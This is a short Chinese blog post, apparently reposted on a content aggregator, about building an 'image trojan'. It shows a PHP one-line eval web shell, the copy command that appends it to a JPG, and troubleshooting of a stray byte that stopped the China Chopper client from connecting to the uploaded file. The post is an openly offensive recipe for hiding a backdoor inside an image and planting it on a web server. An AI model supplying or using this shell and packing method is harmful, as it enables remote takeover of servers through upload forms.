制作圖片木馬中的問題

問題 ：copy命令制作圖片木馬后，菜刀無法連接

1.執行步驟：

一張普通圖片：1.jpg
php版本一句話木馬，保存為 1.php，代碼如下：

<?php @eval($_POST['pass']);?>

制作圖片木馬，將圖片文件和php文件合并為2.jpg，命令如下：

copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表以二進制編碼打開文件，/a代表以ASCII碼編碼打開文件

上傳成功后，用菜刀連接，彈出成功獲取圖片，未拿到webshell。

2.問題排查

用HxD hex editor打開制作的圖片木馬 2.jpg ，如下圖。發現，一句話木馬已經拼接到尾部，但是多了一個符號 ‘.’(紅色的點）。

去掉多余的符號后，再次上傳就ok了。

3.問題解決

修改copy命令如下：

copy 1.jpg/b+1.php/b 2.jpg

再次用HxD hex editor打開修改后的圖片木馬，多余的點已消失。
但此時的圖片木馬無法連接菜刀

然而當使用如下命令時：

copy 1.jpg/a+1.php/a 2.jpg

還是會出現多余的點，猜測是因為ASCII編碼方式導致的，希望有大神可以解釋一下這個現象。

本文結束

總結

以上是生活随笔為你收集整理的图片木马-渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。